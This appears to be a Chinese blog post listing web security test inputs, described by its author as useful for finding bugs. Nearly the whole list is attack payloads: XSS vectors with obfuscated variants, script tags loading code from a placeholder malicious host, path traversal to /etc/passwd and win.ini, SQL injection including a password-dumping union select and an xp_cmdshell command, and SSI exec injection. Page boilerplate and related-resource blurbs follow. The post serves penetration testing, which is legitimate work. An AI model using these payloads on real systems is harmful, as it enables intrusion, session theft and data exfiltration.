`

xss 安全测试

    博客分类:
  • WEB
阅读更多

测试用例:还是挺管用的,真的能发现潜在的bug   

 <script>alert(document.cookie)</script>
  ='><script>alert(document.cookie)</script>
  <script>alert(document.cookie)</script>
  <script>alert(vulnerable)</script>
  %3Cscript%3Ealert('XSS')%3C/script%3E
  <script>alert('XSS')</script>
  <img src="javascript:alert('XSS')">
  %0a%0a<script>alert(\"Vulnerable\")</script>.jsp
  %22%3cscript%3ealert(%22x ss%22)%3c/script%3e
  %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
  %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
  %3c/a%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e
  %3c/title%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e
  %3cscript%3ealert(%22x ss%22)%3c/script%3e/index.html
  <script>alert('Vulnerable');</script>
  <script>alert('Vulnerable')</script>
  ?sql_debug=1
  a%5c.aspx
  a.jsp/<script>alert('Vulnerable')</script>
  a?<script>alert('Vulnerable')</script>
  "><script>alert('Vulnerable')</script>
  ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
  %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
  %3Cscript%3Ealert(document. domain);%3C/script%3E&
   %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
  ../../../../../../../../etc/passwd
  ..\..\..\..\..\..\..\..\windows\system.ini
  \..\..\..\..\..\..\..\..\windows\system.ini
  '';!--"<XSS>=&{()}
  <IMG SRC="javascript:alert('XSS');">
  <IMG SRC=javascript:alert('XSS')>
  <IMG SRC=JaVaScRiPt:alert('XSS')>
  <IMG SRC=JaVaScRiPt:alert("XSS")>
  <IMG SRC=javascript:alert('XSS')>
  <IMG SRC=javascript:alert('XSS')>
  <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  <IMG SRC="javascript:alert('XSS');">
  "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
  <IMG SRC=" javascript:alert('XSS');">
  <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
  <BODY BACKGROUND="javascript:alert('XSS')">
  <BODY ONLOAD=alert('XSS')>
  <IMG DYNSRC="javascript:alert('XSS')">
  <IMG LOWSRC="javascript:alert('XSS')">
  <BGSOUND SRC="javascript:alert('XSS');">
  <br size="&{alert('XSS')}">
  <LAYER SRC="http://惡意網址/a.js"></layer>
  <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  <IMG SRC='vbscript:msgbox("XSS")'>
  <IMG SRC="mocha:[code]">
  <IMG SRC="livescript:[code]">
  <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  <IFRAME SRC=javascript:alert('XSS')></IFRAME>
  <FRAMESET><FRAME SRC=javascript:alert('XSS')></FRAME></FRAMESET>
  <TABLE BACKGROUND="javascript:alert('XSS')">
  <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  <DIV STYLE="behaviour: url('http://惡意網址/exploit.html');">
  <DIV STYLE="width: expression(alert('XSS'));">
  <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  <IMG STYLE='x ss:expre\ssion(alert("XSS"))'>
  <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
  <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  <BASE HREF="javascript:alert('XSS');//">
  getURL("javascript:alert('XSS')")
  a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
  <XML SRC="javascript:alert('XSS');">
  "> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
  <SCRIPT SRC="http://惡意網址/x ss.jpg"></SCRIPT>
  <IMG SRC="javascript:alert('XSS')"
  <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://惡意網址/a.js></SCRIPT>'"-->
  <IMG SRC="http://惡意網址/somecommand.php?somevariables=maliciouscode">
  <SCRIPT a=">" SRC="http://惡意網址/a.js"></SCRIPT>
  <SCRIPT =">" SRC="http://惡意網址/a.js"></SCRIPT>
  <SCRIPT a=">" '' SRC="http://惡意網址/a.js"></SCRIPT>
  <SCRIPT "a='>'" SRC="http://惡意網址/a.js"></SCRIPT>
  <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://惡意網址/a.js"></SCRIPT>
  <A HREF=http://惡意網址/>link</A>
  admin'--
  ' or 0=0 --
  " or 0=0 --
  or 0=0 --
  ' or 0=0 #
  " or 0=0 #
  or 0=0 #
  ' or 'x'='x
  " or "x"="x
  ') or ('x'='x
  ' or 1=1--
  " or 1=1--
  or 1=1--
  ' or a=a--
  " or "a"="a
  ') or ('a'='a
  ") or ("a"="a
  hi" or "a"="a
  hi" or 1=1 --
  hi' or 1=1 --
  hi' or 'a'='a
  hi') or ('a'='a
  hi") or ("a"="aXSS測試語法><script>alert(document.cookie)</script>

分享到:
评论

相关推荐

    XSS测试代码大全————

    XSS测试代码 安全测试 XSS测试代码大全

    测试文档(Xss漏洞)

    测试文档(XSS漏洞) XSS(Cross-site Scripting,跨站脚本攻击)是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意脚本,以便在用户的浏览器中执行恶意代码,窃取用户的敏感信息或实施其他恶意行为。 ...

    Web应用安全:简单XSS测试脚本(实验).docx

    **Web应用安全:XSS(跨站脚本)测试详解** XSS(Cross-Site Scripting)是一种常见的网络攻击方式,攻击者通过注入恶意脚本,使得用户在浏览网页时执行这些脚本,从而获取敏感信息或进行其他恶意操作。本实验旨在...

    Burp Suite XSS测试实战:深入挖掘Web应用的安全漏洞

    Burp Suite是一款强大的Web应用安全测试工具,它提供了一系列的功能来帮助安全专家和开发者发现和修复Web应用中的安全漏洞,包括跨站脚本(XSS)攻击。XSS攻击允许攻击者将恶意脚本注入到网页中,影响其他用户的...

    关于pdf文件xss攻击问题,配置xssFilter方法

    5. 测试验证:确保配置生效后,进行充分的测试,包括正常输入和恶意输入,检查是否能正确过滤XSS攻击。 除了使用XSSFilter,还可以结合其他策略来增强安全性,如: - 使用HTTP头部的`Content-Security-Policy`,...

    深入探索:使用浏览器开发者工具进行XSS测试

    浏览器的开发者工具提供了多种功能,可以帮助开发者和安全专家进行XSS测试,以识别和修复这些漏洞。本文将详细介绍如何使用浏览器开发者工具进行XSS测试,并提供代码示例。 浏览器开发者工具是进行XSS测试的有力工具...

    计算机安全XSS 实际攻击举例

    计算机安全XSS 实际攻击举例 计算机安全是计算机系统和网络的安全保护,避免未经授权...计算机安全XSS实际攻击举例是计算机安全攻防技术中的重要组成部分,使用Burp Scanner可以检测XSS漏洞,并手动测试反射XSS漏洞。

    XSS漏洞 DOM型测试 payload代码

    XSS漏洞 DOM型测试 payload代码 这是测试跨脚本攻击是否有DOM型XSS的漏洞,适合网络安全初学者进行测试。 跨脚本攻击漏洞是top10的一种。

    Xss测试平台.zip

    5. 集成与API:高级的XSS测试平台可能提供API接口,允许与其他安全工具集成,实现持续集成/持续部署(CI/CD)环境下的自动化安全测试。 6. 漏洞管理:平台通常会提供漏洞管理功能,帮助安全团队跟踪漏洞的修复进度...

    XSS测试工具,代码改进

    XSS(Cross-Site Scripting)测试工具是网络安全领域中用于检测和防范Web应用程序中XSS漏洞的重要手段。XSS攻击是一种常见的网络攻击方式,它允许攻击者在用户浏览器上执行恶意脚本,可能导致敏感信息泄露、用户会话...

    存储型XSS灰盒测试-01

    存储型XSS灰盒测试-01 存储型XSS是一种常见的Web应用安全漏洞,它允许攻击者将恶意脚本存储在服务器上,然后在其他用户访问时触发恶意脚本,从而实现攻击。存储型XSS的危害性非常高,因此需要进行严格的检测和防护...

    Web安全测试之XSS实例讲解

    Web安全测试之XSS XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者...

    jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞

    动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...

    网站类安全测试流程规范

    测试工程师目前主要采用两种方法做安全测试,一种是采用自动化安全工具Hatrix扫描测试,自动化安全工具主要能够覆盖XSS、CSRF、SQL Injection,一种是对URL Redirect和Access control这两种漏洞采用手工方式进行测试...

    Java Web XSS安全防御

    **Java Web XSS安全防御** XSS(Cross Site Scripting)攻击是网络安全中常见的威胁之一,尤其是在Java Web开发中。这种攻击允许黑客通过注入恶意脚本到网页中,从而窃取用户的敏感信息,如Cookie、Session等。为了...

Global site tag (gtag.js) - Google Analytics